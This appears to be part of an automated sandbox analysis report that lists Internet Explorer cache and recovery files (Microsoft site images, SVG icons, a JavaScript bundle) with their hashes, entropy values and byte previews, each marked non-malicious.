                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{A55F091C-B36F-11EB-ADCF-ECF4BBB5915B}.dat
                                                                                                                                                                                                              Process:C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:Microsoft Word Document
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):334504
                                                                                                                                                                                                              Entropy (8bit):3.101789807582422
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3072:6SQfrf1fkrfDLtfifJUtBRXkNw/flmfvBRXkww/flmfUBRXkww/flmfYebpbOgqu:Izt8DLVqMEQELErbO0
                                                                                                                                                                                                              MD5:2A25EEB125D7B61F45C3A38781681501
                                                                                                                                                                                                              SHA1:37A6B52E8187D96971D4D13C06680911127BEF35
                                                                                                                                                                                                              SHA-256:B598926E6CC26EA992DFF6A4C85BB57467DA16789C7A3A6E69BED2CCE2451F68
                                                                                                                                                                                                              SHA-512:FAFEEDE73A20D92E56145F5659097D63A8B50F27A6E5F0EC4CEDAAAFE0FDBA7801127BED1137C019FBC7383A0CF7A8F5A74ADF86E370647EA7E286335A2C0920
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{AF3578FB-B36F-11EB-ADCF-ECF4BBB5915B}.dat
                                                                                                                                                                                                              Process:C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:Microsoft Word Document
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):19032
                                                                                                                                                                                                              Entropy (8bit):1.586149791218256
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:IvrGcpUaGwpNzG4pPPGrapgSPGQpZsG7HpCTTGIpM2MGApm:MxKCbFJTeSZ/H0Zazg
                                                                                                                                                                                                              MD5:9C01FE7CE51CDD294F6049E2C22F9859
                                                                                                                                                                                                              SHA1:D308A23BCC1A375371DB08EC81DAA64B5E29E696
                                                                                                                                                                                                              SHA-256:8BFCAE8B5F87CE10E97D32B54DFBA723254D4F6F0EC69AE8724A9837EA9A6A86
                                                                                                                                                                                                              SHA-512:D81B18E637F9B27E83426D7CD233C961A6D3E34AA97DE60A0473AD4236490E63BB63E7DF83713F727515B21E65B959617F8B31BAE38635ED546ABCF1F7826635
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Internet Explorer\imagestore\lr5drzg\imagestore.dat
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):37897
                                                                                                                                                                                                              Entropy (8bit):3.3205653769597756
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:UqWGLrjqJRhEtaP6ABAgAgAGgyyyyyyyyyyyyyaA0fA9QQQQQV+B+4+4+Ggyyyyl:PHqEaLQQQQQ0QQQQQd7xDqlS7iQ3p
                                                                                                                                                                                                              MD5:130732535C0E07F0995FFE1D26417917
                                                                                                                                                                                                              SHA1:D65B2F948351208621CC6EE8C54A8582653FDAD5
                                                                                                                                                                                                              SHA-256:6A28D36551BE74DC48AB4229CC5299F3915F5C93319D2D05D262FA0A9D0EA0EB
                                                                                                                                                                                                              SHA-512:5712659498AB1B1818C0E9B872BEFD0A91D04C0E611F83678E9D4292F2D30C313963A46FAB665F403F79A4E28890AFC2263647C47BEB2D6E8DC6C8027BE74ADD
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: /.h.t.t.p.s.:././.s.u.p.p.o.r.t...m.i.c.r.o.s.o.f.t...c.o.m./.f.a.v.i.c.o.n.-.3.2.x.3.2...p.n.g.w....PNG........IHDR... ... .....D.......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<...{PLTE.P".J$x......P".P".J$x.........K..K..K..D.o..w..w..w.........................................................P"...................$tRNS.DD...CC..DEC..CEDDEC..CED...CC...DD.c,8....bKGD(........pHYs...........~.....tIME....."4...4...QIDAT8...G.. ...Q..s....?......s.f..a`.A... .bA!..,/dYQ.....a.((j^.m?4..Q.?.....2>.........%tEXtdate:create.2020-05-28T22:34:52+02:00.t.....%tEXtdate:modify.2020-05-28T22:34:52+02:00.)<'...WzTXtRaw profile type iptc..x.....qV((.O..I.R..#..c..#.K.... D.4.d.#.T ...........H.J.....t.B5.....IEND.B`. ... ............S.`.....S.`....(.h.t.t.p.s.:././.w.w.w...m.i.c.r.o.s.o.f.t...c.o.m./.f.a.v.i.c.o.n...i.c.o.?.v.2.~(................h(......(....................(....................................."P.........................................."""""""""""""""""""""""""
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\0c32de74-aabe-4cbe-8438-81fde48ce460[1].jpg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:[TIFF image data, little-endian, direntries=17, height=4912, bps=218, PhotometricIntepretation=RGB, description=Deutschland,Baden-W\303\274rttemberg,Mannheim,senior,zu Hause,lifestyle, manufacturer=NIKON CORPORATION, model=NIKON D800, orientation=upper-left, width=7360], baseline, precision 8, 358x201, frames 3
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):34262
                                                                                                                                                                                                              Entropy (8bit):7.4169331390184166
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:5Bp/Jvzqn7Q/J4tLXAZ1Yo0lY5BlH+DDzMBUp+37tVh:5LJLqKJ4du1hsqrH+PzB+pVh
                                                                                                                                                                                                              MD5:DEF3FFC9F14912C4A091946396234B5F
                                                                                                                                                                                                              SHA1:DC0813C04EC0C7C0CFC1E4FACA5A2BE5A0ABAEA8
                                                                                                                                                                                                              SHA-256:4568D95D11D487D44574891E70F1D020E1CC00E2452321B42141DDB69BAAD10D
                                                                                                                                                                                                              SHA-512:0A1F2A3495FDEE29AEE7F01F0DD8DB1D8CC79DCBF6E9D516D4FDD190C1A35D342100A1D231CCD79A1DAF775E087B625BED0222DE882279515543897B78B0868A
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://support.content.office.net/en-us/media/0c32de74-aabe-4cbe-8438-81fde48ce460.jpg
                                                                                                                                                                                                              Preview: ......Exif..II*...........................0...............................B..............."...........4...................................?...........G...(...........1..."...O...2.......q...;.......................i...........`.........Deutschland,Baden-W.rttemberg,Mannheim,senior,zu Hause,lifestyle.NIKON CORPORATION.NIKON D800...-..'....-..'..Adobe Photoshop CC 2019 (Windows).2020:04:08 10:11:19.Westend61.Westend61 / Uwe Umst.tter...*........................."...........'...........0...................0230................................................................................................................................90..........90......................f..............................................................................................................................................."...........2...........................................................................1.......*...2.......2...4.......R.......................2016:01:23 15:02:31.2016:01:23 15:
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\1399_Panel15_Mosaic_Item6_Blue[1].jpg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:[TIFF image data, little-endian, direntries=0], baseline, precision 8, 700x400, frames 3
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):4412
                                                                                                                                                                                                              Entropy (8bit):2.141776684434924
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:lK1h6A1aWwh82lYSgKcZh9VnhGT3TyJEumGumNG0jJdYldq:y11LvnrZh9NhGCJEdGdNVJn
                                                                                                                                                                                                              MD5:99ADDA312F2C2CA021E77A7F1F2CE9F6
                                                                                                                                                                                                              SHA1:CBE46D3DDD6EF7EC913A16DFBDCAF9D8A61E700F
                                                                                                                                                                                                              SHA-256:D9BD1F2DDA51B1ED6F0B0A3285659B61A04DCDB1237D5CE5C36B869C551BCED8
                                                                                                                                                                                                              SHA-512:15C56C19BE1F1C4579A0E115CAA7B520D8DBCA6415A89BAFA56AE912BFA3A5E2843835164462A3B195F8405A38459231F43F94D3E764509A167D40391ADF5D08
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://c.s-microsoft.com/en-us/CMSImages/1399_Panel15_Mosaic_Item6_Blue.jpg?version=8513686a-0460-082f-dec0-663b3b898a7b
                                                                                                                                                                                                              Preview: ......Exif..II*.................Ducky.......K......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c148 79.164036, 2019/08/13-01:06:57 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:B56B8D775CBB11EA88EEDBD181122FD0" xmpMM:InstanceID="xmp.iid:B56B8D765CBB11EA88EEDBD181122FD0" xmp:CreatorTool="Adobe Photoshop 2020 Macintosh"> <xmpMM:DerivedFrom stRef:instanceID="8F6B98E30D2E75BCEAE1C4EA6B2EEB5C" stRef:documentID="8F6B98E30D2E75BCEAE1C4EA6B2EEB5C"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d................................................................................................................................................
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\17-f90ef1[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):135290
                                                                                                                                                                                                              Entropy (8bit):5.2254562447372
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3072:1f/HuFzpxJIS20i9d1EwgXA95KSqDCE4t:1f/HuXIZRjt
                                                                                                                                                                                                              MD5:07CB1B6723F61F949C862B399E06B3BF
                                                                                                                                                                                                              SHA1:83ABC38AB7E787F719E859E3EA97D4A634FE61FC
                                                                                                                                                                                                              SHA-256:82A7ACB7D942575069E4067375BEC0C33F1949EA2864BE8BD12E9D6DB74A345D
                                                                                                                                                                                                              SHA-512:D520D31E12A3D2D316347D96E4E3D20D7E5C988A4824228097D1DF0A5AB3F12334096C2ADD5D0A7345EF8A2E674712F84D9F8CFC2E973A2A4DEDA546337C94CD
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://www.microsoft.com/onerfstatics/marketingsites-wcus-prod/shell/_scrf/js/themes=default/54-af9f9f/c0-247156/de-099401/e1-a50eee/e7-954872/d8-97d509/f0-251fe2/46-be1318/77-04a268/11-240c7b/63-077520/a4-34de62/bb-d7480b/db-bc0148/dc-7e9864/6d-c07ea1/9d-b58f60/f6-aa5278/cd-23d3b0/6d-1e7ed0/b7-cadaa7/c4-898cf2/ca-40b7b0/4e-ee3a55/3e-f5c39b/c3-6454d7/f9-7592d3/92-10345d/79-499886/7e-cda2d3/69-13871c/b7-0ad59f/e0-3c9860/91-97a04f/1f-100dea/33-abe4df/17-f90ef1?ver=2.0&_cf=20210415&iife=1
                                                                                                                                                                                                              Preview: (function(){/**. * @license almond 0.3.3 Copyright jQuery Foundation and other contributors.. * Released under MIT license, http://github.com/requirejs/almond/LICENSE. */.var requirejs,require,define,__extends;(function(n){function r(n,t){return w.call(n,t)}function s(n,t){var o,s,f,e,h,p,c,b,r,l,w,k,u=t&&t.split("/"),a=i.map,y=a&&a["*"]||{};if(n){for(n=n.split("/"),h=n.length-1,i.nodeIdCompat&&v.test(n[h])&&(n[h]=n[h].replace(v,"")),n[0].charAt(0)==="."&&u&&(k=u.slice(0,u.length-1),n=k.concat(n)),r=0;r<n.length;r++)if(w=n[r],w===".")n.splice(r,1),r-=1;else if(w==="..")if(r===0||r===1&&n[2]===".."||n[r-1]==="..")continue;else r>0&&(n.splice(r-1,2),r-=2);n=n.join("/")}if((u||y)&&a){for(o=n.split("/"),r=o.length;r>0;r-=1){if(s=o.slice(0,r).join("/"),u)for(l=u.length;l>0;l-=1)if(f=a[u.slice(0,l).join("/")],f&&(f=f[s],f)){e=f;p=r;break}if(e)break;!c&&y&&y[s]&&(c=y[s],b=r)}!e&&c&&(e=c,p=b);e&&(o.splice(0,p,e),n=o.join("/"))}return n}function y(t,i){return function(){var r=b.call(arguments,0
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\1920_Panel03_Banner_StayonTrack[1].jpg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 319x175, frames 3
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):22127
                                                                                                                                                                                                              Entropy (8bit):7.97303135615474
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:fe3fEE89k9fcFMAPYvbHl1QoAU9fqvwiszc67KQAXnZ4X7lBe39ja:ofEE899I3QrU9OwiGqnZwBBepa
                                                                                                                                                                                                              MD5:8DE360BD280335CA4EB199888252B72F
                                                                                                                                                                                                              SHA1:D76A8ADBE21D2E3C6B190CFA03A6671687C664AB
                                                                                                                                                                                                              SHA-256:6657B4E1C66B69E166F70BFBE9BF59F9A6E7D2764C8B3259AD7D363AA0943C75
                                                                                                                                                                                                              SHA-512:4AECEC0CD0D4D00BF00A4278314D828DAD3315B2B7C6BE76D2311E8D4DFA74352EC2FD4D11763F914990A67403167C1BCB16D8296AD7E4A7FCBC585E10881C3B
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://c.s-microsoft.com/en-us/CMSImages/1920_Panel03_Banner_StayonTrack.jpg?version=b9ff2aa4-ba31-cad7-3920-ed5467501d7b
                                                                                                                                                                                                              Preview: ......JFIF........................................................................................................................................................?...................................................I....M...Y8.f.'.:P......U...3.........,..rf..)...Y8....0e.WA...uJ{.Y....S%....#._BP6..nc~|..%...nN.gE.?.k=../u.....S...^.......ei.m.x'.........q...:...:...H.rn.t/.v_k...t...8...G:.E..!.V.r.4A!\.4/...[fb..@l...k.c<.1.......L.}Q.....i..../...[k-](c..h.!.0C1.......f.M5.t.C..qYR;f.{c....gt.....t]...c4...8.ik^.......xq.P.#.3:Q..>....yg@.....@sP..;..[COT....1..}.B..e..gDp...,..4..~.%(..%.ms....<1.}.j..T...O..E.e.F.l.e.@'.a5.%.......oz>...#...g..\.o}......c......M.z#..E....w[;.@.."l.n..v..Pd.......?.[.Pj.9..#.z....J..+..%.........|....M....{.H...E...2&lriF...I.Be>...#...5.-9;.J<!y.:Ud...7.....x..\...H..@.Cq....X..........ak&.&t..1.k..}.....m.zc.R.3F#...:.zt)..Y.[..F..9.[./cA.>m.o.>..MC.../nY.C......0...f@..{...Z.t...jG..b....H..Z.:..
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\1920_Panel06_PriorityFeature_Security[1].jpg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1040x585, frames 3
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):101672
                                                                                                                                                                                                              Entropy (8bit):7.966199724517465
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:uZUPmA/MEynItoQtYPgognzJyJpXH9ewR8Y5qQwi895pEAqSsK82u3AafsyF9jqq:uZSonCvoglSpdeu8YeDpCSX82q3qVYyU
                                                                                                                                                                                                              MD5:770EBB154C0A43367A1CC212EDF18C94
                                                                                                                                                                                                              SHA1:B4304556D314B622E96064CB316BD34FCED2F0CD
                                                                                                                                                                                                              SHA-256:5B7404199463D38511324A09EB4200D3EC9B6E749863218EEF22226B09BBD911
                                                                                                                                                                                                              SHA-512:AC92422CA06140E4D778E10F19EE16332B35ACA3DC74585F182AEAC006E63A8C3A7DAFAAE7E9152CF5A18424B9761C1AF66A066B32B5CA1C74C6A2457C1492CF
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://c.s-microsoft.com/en-us/CMSImages/1920_Panel06_PriorityFeature_Security.jpg?version=5e3f1a97-c694-90c1-e86c-675c1eefd82f
                                                                                                                                                                                                              Preview: ......JFIF......................................................................................................................................................I.......................................................wf.v}.@..........X.KJ]Kq..<X......Q.D].>..u.iQS.o?..g.6.H..........,jIen..G\<{a....H .K.....I$...|..o.<p...6..h..........~~5..[Z..,X..A.65q".E...]}..4.I}U>d...../'..3v..s.@.......-..c.....m.....>...1..b.._,....-.TcA....>..7%.Yv-.x.6.........`y.]u.Mf>N...^...8...{Ve..3:..|..d...O5.........,j.....OJI..............K|le,..."..m.|._v.;/.{. ...|..>^fvnd..Q.][0".a.8.....;*....t-.|.*.......W.ek.#..b...71..2H!..:<..j._}.K.FNvw....j..G.ze....6..;`..|Or..c.....z......WO. ..|.....~.Y.5......[...>....Yrr../Kd..w.y.8...).p.y..w.m..Et6...:F........Q.......;....$.v.b..Kg..A|.2{......+;...)....u.U[m.c.b..m..~kd.~...w..y.......S..K)Lj[.[1...C.<T.x.t...K.....4.]\.o..:D.vD.v...2.8.2V.y....6..'|.2.|.z.........i.+"...+/.,..5r+m1.~...|.][.V....5..0
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\1920_Panel07_PriorityFeature_GamePass[1].jpg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1040x585, frames 3
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):194936
                                                                                                                                                                                                              Entropy (8bit):7.984735984852966
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3072:VPq1EfH4ipm/OpRBTr7/AUdjGwMac4+Ahcn6jBEWwNkUF3JzWzRk4uvHeA3:km4is/0jjZJGYEWwN3ZJ6+vd3
                                                                                                                                                                                                              MD5:3C2411D672DD60168176D3B62635AD4C
                                                                                                                                                                                                              SHA1:53D18AC4194069581949AB08781137F3FCE6C85F
                                                                                                                                                                                                              SHA-256:3C60463AC0955E563DA69B5D767654B5508BB596F848C39DD03E298ED88B80DE
                                                                                                                                                                                                              SHA-512:ADDF61092699862BB063CB417FAC389D44CD626171F83AA23B335D82B3EE17006D2CB2218E633B5DCFF2AB839DBCD3345A7443CA2120A46E1F6C6F6F2210C36C
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://c.s-microsoft.com/en-us/CMSImages/1920_Panel07_PriorityFeature_GamePass.jpg?version=67718e36-854a-a201-1dd8-12a68d406d7f
                                                                                                                                                                                                              Preview: ......JFIF......................................................................................................................................................I......................................................L..&....P.....*"%u*"."..""""....d.A....*..Z....R..,Y....vf...C!$...P..P..QQQ+J.P...V.E.....D.A..A........u.u...c...^...5.B.....T..B....kTJ.T.$..Q.kEDEE. .A....(UTU....EPD.9gwk.....<0......(P.**.."".!.(UDTDZ.k...A .. X..U.+.......B..f......[.1-!........*..DUY....*."."*...........Z....i..DQ....\..;Z.?.........T..."...!.........(...X..@UP.Z.]u.U5SMu"..L..3...kY...12@@...DUX.(.....@.P....UT...@.."..Q......h...DU...1v..f....$.....,X.......,d.(P....UT.$....E.B...U.QM..UU%b.....v{I....0.$"..."... ..392@..U@...B..A....,P.U.........)...Q`.....d{...0.!.E...H..C..,..x@D..h.......z(.........D...D.kDJ......*....j...,.F.....0.4.L....@ .....|U.*..XlkM...{..A........&+l2.k-..{-.s.Yc.aiO......UV.......<...2Ba.I 2...I.7...=.v..Q..,.&Fs>f.cv....5...z..8.:..l...v.DP.j..
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\1920_Panel24_3Up_Footer_Surface[1].jpg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 485x273, frames 3
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):35907
                                                                                                                                                                                                              Entropy (8bit):7.983363992036313
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:KmVByvtbA1x6PV9SY+/I7uLx/1YymkGrFXlJ45vGr9c2YhlyYnT:/VkyOPVU8kDYymZXlJ45uK2YhQYT
                                                                                                                                                                                                              MD5:10CB709B4E0906D84228CE55C7CC74BD
                                                                                                                                                                                                              SHA1:7C015A6D1D5058B82BFFAFE041EDC0267AF1D67A
                                                                                                                                                                                                              SHA-256:133A201053B5F51BC75E333979E84C2CF74008642E6B7724DE3E03951FA368AE
                                                                                                                                                                                                              SHA-512:9E208BF8CA717067325992C4D097784B9CA554E1A893EE2701AE33E98FFF55BD138440C6493618D6F518EDDBCC9FB1B8ED1664FB615AD9C8B8C1883E6865AEC1
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://c.s-microsoft.com/en-us/CMSImages/1920_Panel24_3Up_Footer_Surface.jpg?version=7bcc912d-1a61-9307-f613-1997da2a573e
                                                                                                                                                                                                              Preview: ......JFIF...............................................................................................................................................................................................................G8..T.'....:...O..}!K.cd.".4...>.P.U......Q`.6I..u_}C.+....r..N..+.bK...C.%M..9......g..m.M+7q.....*....k.]v8%.EY>..Q#e.../7?...x.6:.'&.<..V..^.ZW..#....$j..j...:)...|Y.k......n:l...\...qc....+.=.........]..b.......7.......X.q/...Z.........^.. .!..GI..nV...q...|...._'.;...v...^..o.y.BLq...v<lT....z.g..}j.b..'...z.4..HJ.9WO...<..FA..E..p...NBR....e....sm.;...U..Xn.........~fX$....[w:.E[....]....]Hw..}6.....<......-../377.."...r..q...@...7....Y...6.zx....V.t.....[k......')......-.>.k.....d.3iw_.............!x.]..V...y.t.(....k......7..S%..5Y.l......Ix,.H.cY.../.@.i.g.+...k..Jk.Ix......&m..XV..q.........ky....4...>n.4.sGL.1....j>...j._.....!..Vs/.y.&.J.;....H0Uk.+......cSn.=l...\....T.<.../..0....p.....V..._.&..8.-u.c.../.0"...[....
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\1920_Panel2_LinkNav_Learn[1].svg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):445
                                                                                                                                                                                                              Entropy (8bit):5.2124097142399695
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:ty0Se14wj6Eq9UTZABQ00q2LtcwTNIUUQdyM:tzS64wjIU8ZeZeM
                                                                                                                                                                                                              MD5:792C8C8348A6B6C9C4D0C5B3C4060960
                                                                                                                                                                                                              SHA1:8D9938AC1F2E8F0D0F7B1AC6D1864EB6570FACAF
                                                                                                                                                                                                              SHA-256:14FA7C030BDA8A06A548DB5427394C8B838B298189320EACC395E6D2A53D5FAA
                                                                                                                                                                                                              SHA-512:B852CB7D335B6E96986315A565ECA925878E5EBB718EA1F9DD62E34630A6931F1D3F633D16715ED452DC7DE3E5834C5C65A38FE1F58C302AC1BC10240B7DCF57
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://c.s-microsoft.com/en-us/CMSImages/1920_Panel2_LinkNav_Learn.svg?version=a4eea77a-5b70-52b3-ef7b-02c39336c3fc
                                                                                                                                                                                                              Preview: <svg enable-background="new 0 0 64 64" viewBox="0 0 64 64" xmlns="http://www.w3.org/2000/svg"><switch><foreignObject height="1" requiredExtensions="http://ns.adobe.com/AdobeIllustrator/10.0/" width="1"/><g><path d="m30.577 31.383h16.923v-14.883l-16.923 2.364z"/><path d="m29.373 31.383v-12.351l-12.873 1.8v10.551z"/><path d="m30.577 32.586v12.553l16.923 2.361v-14.914z"/><path d="m29.373 32.586h-12.873v10.589l12.873 1.796z"/></g></switch></svg>
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\1920_Panel_LinkNav_Briefcase_I_[1].svg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):770
                                                                                                                                                                                                              Entropy (8bit):5.4230480059503465
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:TMHdPhGi/nzV0xoc/KYcc+jzHrKxft5SWjMa/7JBKnU6+WvWQ:2dMA5cLPyLkMa/NkU/Wvr
                                                                                                                                                                                                              MD5:E77F8C94269F5DA46F9E2D260F0E8A68
                                                                                                                                                                                                              SHA1:D5A6B5C2D4A3E08043B1C9D8484C744638DEB46D
                                                                                                                                                                                                              SHA-256:AFCCD82C63D87D6BD6390EE7CA32E6004446444A5278D83D2DC5F09DF20224FF
                                                                                                                                                                                                              SHA-512:5315E06EF854447173B9AED95357E53B17CDA3F4B078002F4C0ACAC2C6CDA1B9A1B05FC717928A069C837161255B383D6E389DD6235ED078DF5AB63362474DE6
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://c.s-microsoft.com/en-us/CMSImages/1920_Panel_LinkNav_Briefcase_I_.svg?version=19243b0e-4d5a-e345-6747-92b9ef181fa2
                                                                                                                                                                                                              Preview: <?xml version="1.0" encoding="utf-8"?>. Generator: Adobe Illustrator 25.0.1, SVG Export Plug-In . SVG Version: 6.00 Build 0) -->.<svg version="1.1" id="Isolation_Mode" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px".. y="0px" viewBox="0 0 64 64" style="enable-background:new 0 0 64 64;" xml:space="preserve">.<style type="text/css">...st0{fill:#0078D5;}.</style>.<g>..<path class="st0" d="M64,16v40H0V16h20v-4c0-0.5,0.1-1.1,0.3-1.6c0.2-0.5,0.5-0.9,0.9-1.2c0.4-0.4,0.8-0.7,1.3-0.9...C22.9,8.1,23.5,8,24,8h16c0.5,0,1.1,0.1,1.6,0.3s0.9,0.5,1.3,0.9c0.4,0.4,0.7,0.8,0.9,1.3s0.3,1,0.3,1.5v4H64z M5,21v4.8l19,10V32...h16v3.7l19-10V21H5z M59,51V31.2l-19,10V44H24v-2.7l-19-10V51H59z M25,16h14v-3H25V16z M28,36v4h8v-4H28z"/>.</g>.</svg>.
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\41aee2e2-0277-4d32-88ad-95540b836654[1].svg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):1155
                                                                                                                                                                                                              Entropy (8bit):5.051451078807304
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:2dVNATLf3SKwjRSRjH+ERBkyD7CxRPHNJjR3dP20v:cvAvf3SBoeERBkyDARffvuW
                                                                                                                                                                                                              MD5:0F8B468B28B2A9B2F3193DD369EAEA7C
                                                                                                                                                                                                              SHA1:630818C41FE6639465ADE990AAA037C8C995FD72
                                                                                                                                                                                                              SHA-256:90AA4E521093BF291ECA253AD4BEFA053ECC89FDCDAD557C7468CB27B175D32A
                                                                                                                                                                                                              SHA-512:AD2689379FC84010BFE1E197FB3B2FE6638437B918614624F030A3519C3A5F5AC171052E85AA7B2340FE5DB297D3C19CCF8DEC8A4E4A220C8C7D525BC2E8F631
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://compass-ssl.xbox.com/assets/41/ae/41aee2e2-0277-4d32-88ad-95540b836654.svg?n=Homepage-FY20_Home-Icons-0_Deals_72x56-01.svg
